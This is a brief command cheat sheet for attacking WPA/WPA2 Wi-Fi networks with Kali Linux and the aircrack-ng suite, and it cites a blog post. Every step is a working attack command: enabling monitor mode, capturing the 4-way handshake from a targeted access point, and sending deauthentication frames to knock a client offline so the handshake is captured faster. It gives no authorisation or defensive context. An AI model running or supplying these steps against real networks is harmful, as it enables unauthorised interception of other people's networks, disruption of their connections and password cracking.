Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

list all of the wireless cards that support monitor (not injection) mode :

airmon-ng

put interface on monitor mode :

airmon-ng start [wifi interface name]
airmon-ng start wlan0

list all of the wireless networks in your area :

airodump-ng [monitor interface name]
airodump-ng mon0

save any intercepted 4-way handshakes to file(necessary to crack the password) :

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

force client to deauthentication to capture password faster :

aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
aireplay-ng -0 2 -a 00:14:BF:E0:E8:D5 -c 4C:EB:42:59:DE:31 mon0

References :
http://lewiscomputerhowto.blogspot.co.uk/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html